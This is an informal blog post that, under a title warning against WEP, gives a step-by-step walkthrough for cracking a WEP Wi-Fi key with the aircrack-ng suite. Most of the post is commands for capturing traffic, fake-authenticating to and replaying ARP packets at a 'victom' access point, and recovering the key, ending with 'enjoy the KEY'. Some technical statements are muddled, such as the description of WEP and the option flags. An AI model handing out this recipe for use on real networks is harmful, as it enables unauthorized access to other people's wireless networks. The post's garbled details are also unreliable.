Why You Should Not Use WEP IEEE 802.11 Anymore!



Hello Everyone its Looper Back again as I Promise I will write Blog about Security and show that why you should not use WEP algorithm anymore because its very much vulnerable.

Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network. WEP use 24 bit initialization vector. Today I am gonna show You How to Crack WEP key. Using Kali .You can use Windows to if you install Aircrack utility somehow.
Hence its open source so it is built in Kali rolling LTS 2016 or later.SO Follow the Steps

Fire up Kali Terminal and type following Command

airodump-ng wlan0mon

we will see WEP in security type tab so we run following command on that WiFi

airodump-ng --channel 1  --bssid <BSSID> --write <Any name for File> Then wlan0mon

it will start scanning network and file name will be saved with .cap extension

Open Another Terminal and type 

aireplay-ng --fakeauth -0  -a <victom MAC> -h <Your MAC> wlan0mon

-0 for infinite attempts
You can your  MAC by using this command in separate terminal ifconfig 

When you get Some packet Hit Control+C to stop.
After that we will use additional traffic same command but -b for base station instead of - a
So You will type this  

aireplay-ng --arpreplay -b <victom MAC> -h <our MAC> wlan0mon

Open new terminal and type this command with file that we saved earlier

aircrack-ng <Filename>.cap

It will show the cracked Key after some time and some scanning sequence
the key will be shown. It will be in Colon (:) all you have to do remove colon and enjoy the KEY



                                                                                                                             LOOPER



Comments